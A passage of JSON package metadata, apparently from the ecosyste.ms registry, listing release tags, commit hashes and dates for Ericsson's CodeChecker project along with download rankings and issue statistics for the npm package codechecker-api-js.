"html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.1-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.1-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1-hotfix1/manifests"},{"name":"v6.15.1","sha":"692e51ba4be08e97c4b07cc344edca082dc50f63","kind":"commit","published_at":"2021-02-03T12:52:17.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1/manifests"},{"name":"v6.15.0-hotfix1","sha":"267e9cb77e55f77a457b3b1f2f3660f35564939e","kind":"commit","published_at":"2021-01-08T11:03:43.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0-hotfix1/manifests"},{"name":"v6.15.0","sha":"131861b7e94298f58cad883a533814573b89a0f3","kind":"commit","published_at":"2020-11-12T23:55:40.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0/manifests"},{"name":"v6.14.0","sha":"644f900e80e2053cdb7d69eee3dfa34e622c185c","kind":"commit","published_at":"2020-09-11T13:12:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.14.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.14.0/manifests"},{"name":"v6.13.0","sha":"17678b103375a9dbff6e69328d0996d54de78ef3","kind":"commit","published_at":"2020-07-10T13:24:53.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.13.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.13.0/manifests"},{"name":"v6.12.1","sha":"be4c6ac31f125be8432589ea9e9e5b1bbd838d22","kind":"commit","published_at":"2020-06-12T11:46:39.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.12.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.1/manifests"},{"name":"v6.12.0","sha":"ecccb6308db0a16d80bb6273280d482576d28d8b","kind":"commit","published_at":"2020-05-14T17:59:12.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.12.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.0/manifests"},{"name":"v6.11.1","sha":"9bb0047368707a18efaca3a207dc8227c8e19b9e","kind":"commit","published_at":"2020-02-12T23:12:06.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.11.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.1/manifests"},{"name":"v6.11.0","sha":"65a042f1ad0dec5581d54cb13396d201a573c0b2","kind":"commit","published_at":"2019-12-12T16:41:02.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.11.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.0/manifests"},{"name":"v6.10.1","sha":"d3928e30d25bd10da977d2d1119f300a30179cc0","kind":"commit","published_at":"2019-10-09T14:33:54.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.10.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.1/manifests"},{"name":"v6.10.0","sha":"28cb13900c6e2ada55f469d267e05cab9844a97a","kind":"commit","published_at":"2019-07-11T18:00:44.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.10.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.0/manifests"},{"name":"v6.9.1","sha":"197579e082c64e42043683b4e14ae2228a5c7d89","kind":"commit","published_at":"2019-04-11T13:22:48.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.9.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.1/manifests"},{"name":"v6.9.0","sha":"03351d259b47a57d0c0daebf2a2b00149ea37298","kind":"commit","published_at":"2019-02-08T14:26:17.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.9.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.0/manifests"},{"name":"v6.8.1","sha":"e8b4c6172b45428f997c0e7f37891e11ae312180","kind":"commit","published_at":"2018-11-08T10:10:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.8.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.1/manifests"},{"name":"v6.8.0","sha":"2bd99a0b24b4b62fb85992f94ab682c4a9ddc362","kind":"commit","published_at":"2018-09-11T11:33:21.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.8.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.0/manifests"},{"name":"v6.7.1","sha":"968bd5ae5f82fe2d5d329005a2e7748c1200d8fc","kind":"commit","published_at":"2018-06-08T09:08:07.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.7.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.1/manifests"},{"name":"v6.7.0","sha":"9c4f1c514517af66c92e8b73332a79f2adf69e73","kind":"commit","published_at":"2018-05-16T11:22:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.7.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.0/manifests"},{"name":"v6.6.0","sha":"d507de883bd29bdc8221e8ecb74c9d1117ad5867","kind":"commit","published_at":"2018-03-22T14:30:07.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.6.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.6.0/manifests"},{"name":"v6.5.1","sha":"fd2df3820f3985e4b2e2b576d0cc9aa9c2474348","kind":"commit","published_at":"2018-02-22T16:01:26.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.5.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5.1/manifests"},{"name":"v6.5","sha":"7370d62dccac3c5ce2771764fa92b8e3bc22bbac","kind":"commit","published_at":"2018-02-07T12:01:41.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5/manifests"},{"name":"v6.4","sha":"32ea3cf57eb71255307c065ff8bac6513e0064b9","kind":"commit","published_at":"2018-01-11T14:04:15.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.4/manifests"},{"name":"v6.3","sha":"44c2a7740fa27b9459c40daea2b7836b1c8ca250","kind":"commit","published_at":"2017-12-11T19:02:13.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.3/manifests"},{"name":"v6.2.1","sha":"174807916c5df8cd80bb08d5f11ac6a49f9e91bf","kind":"commit","published_at":"2017-11-27T16:06:34.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.2.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2.1/manifests"},{"name":"v6.2","sha":"b5ef68f0049ce63a767d82ca602b470ad3f5e758","kind":"commit","published_at":"2017-11-15T16:54:58.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2/manifests"},{"name":"v6.1.1","sha":"64e128e075defb1e05002ecef481ca120d79fb84","kind":"commit","published_at":"2017-10-27T14:25:16.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.1.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1.1/manifests"},{"name":"v6.1","sha":"ab67d2626297da41ec42afa2cbb404538069db1f","kind":"commit","published_at":"2017-10-13T16:22:51.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1/manifests"},{"name":"v6.0.1","sha":"f7506fde033e6f57af6612847b447af69077ac8c","kind":"commit","published_at":"2017-10-02T09:28:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.0.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0.1/manifests"},{"name":"v6.0","sha":"666452b9ab4fc97438ac2c45166def3bd3269971","kind":"commit","published_at":"2017-09-18T22:19:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0/manifests"},{"name":"v5.10","sha":"927979c4eee9f53f5fec79fba3e1be7c606c599c","kind":"commit","published_at":"2017-08-09T18:31:55.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.10","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.10/manifests"},{"name":"v5.9","sha":"ebb1d0330efa1da5712a01c92e0c004aba46bd05","kind":"commit","published_at":"2017-07-14T14:09:07.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.9","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.9/manifests"},{"name":"v5.8","sha":"e8f7d02769a613286c1749d70495ba6a41f7427c","kind":"commit","published_at":"2017-07-07T12:32:03.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.8","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.8/manifests"},{"name":"v5.7.1","sha":"2eca2df6a9d0f5482c1783f063568de5c1ddbe5d","kind":"commit","published_at":"2017-02-09T17:03:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.7.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7.1/manifests"},{"name":"v5.7","sha":"1ce7ccbefb1212726331a1fcde4dd37a17cdaccf","kind":"commit","published_at":"2017-01-11T17:17:22.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.7","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7/manifests"},{"name":"v5.6","sha":"e1b0157ad9f61a946fa0343708be7336cf1a6314","kind":"commit","published_at":"2016-11-15T09:20:43.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.6","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.6/manifests"},{"name":"v5.5","sha":"c7bafa16fdaf48ed7a890aea002ae0275e32d963","kind":"commit","published_at":"2016-08-30T10:06:53.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.5/manifests"},{"name":"v5.4","sha":"bcc8c663294739c3946e6cd147e0f98fa0e2d57f","kind":"commit","published_at":"2016-08-05T10:43:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.4/manifests"},{"name":"v5.3","sha":"902c6cf189d747faae5684c4f3f790224dde5eab","kind":"commit","published_at":"2016-04-14T15:55:10.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.3/manifests"},{"name":"5.2","sha":"13cd6b405ed50ed5865c486eda44bf7e7d52b929","kind":"commit","published_at":"2016-02-17T12:35:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/5.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/5.2/manifests"},{"name":"v5.2","sha":"13cd6b405ed50ed5865c486eda44bf7e7d52b929","kind":"commit","published_at":"2016-02-17T12:35:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.2/manifests"},{"name":"v5.1","sha":"ab6c82930bde31e558ca20790df7a701e04ed7e6","kind":"commit","published_at":"2015-11-26T13:16:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.1/manifests"},{"name":"v5.0","sha":"5bb577a9c03bbe78317a4a57d20c0c1e3a3064d0","kind":"commit","published_at":"2015-11-11T10:02:45.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.0/manifests"},{"name":"v4.0","sha":"72075b4a94b791cee9f434ea5d06c702e2fce16d","kind":"commit","published_at":"2015-08-26T13:33:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v4.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v4.0/manifests"}]},"repo_metadata_updated_at":"2025-08-19T18:14:34.588Z","dependent_packages_count":1,"downloads":17,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":12.080109540227989,"dependent_repos_count":25.32799796580169,"dependent_packages_count":16.223928578504864,"stargazers_count":2.488846295163793,"forks_count":2.4057458773165283,"average":11.705325651402973},"purl":"pkg:npm/codechecker-api-js","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/codechecker-api-js","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/codechecker-api-js","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/codechecker-api-js/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2025-08-10T06:58:09.855Z","issues_count":289,"pull_requests_count":576,"avg_time_to_close_issue":24131448.2,"avg_time_to_close_pull_request":3397393.635220126,"issues_closed_count":110,"pull_requests_closed_count":477,"pull_request_authors_count":72,"issue_authors_count":116,"avg_comments_per_issue":1.6678200692041523,"avg_comments_per_pull_request":0.7586805555555556,"merged_pull_requests_count":412,"bot_issues_count":0,"bot_pull_requests_count":59,"past_year_issues_count":89,"past_year_pull_requests_count":224,"past_year_avg_time_to_close_issue":3579611.04,"past_year_avg_time_to_close_pull_request":1482183.1176470588,"past_year_issues_closed_count":25,"past_year_pull_requests_closed_count":170,"past_year_pull_request_authors_count":37,"past_year_issue_authors_count":52,"past_year_avg_comments_per_issue":1.0337078651685394,"past_year_avg_comments_per_pull_request":0.5491071428571429,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":22,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/issues","maintainers":[{"login":"dkrupp","count":73,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dkrupp"},{"login":"vodorok","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vodorok"},{"login":"Szelethus","count":55,"url":"https://issues.ecosyste.ms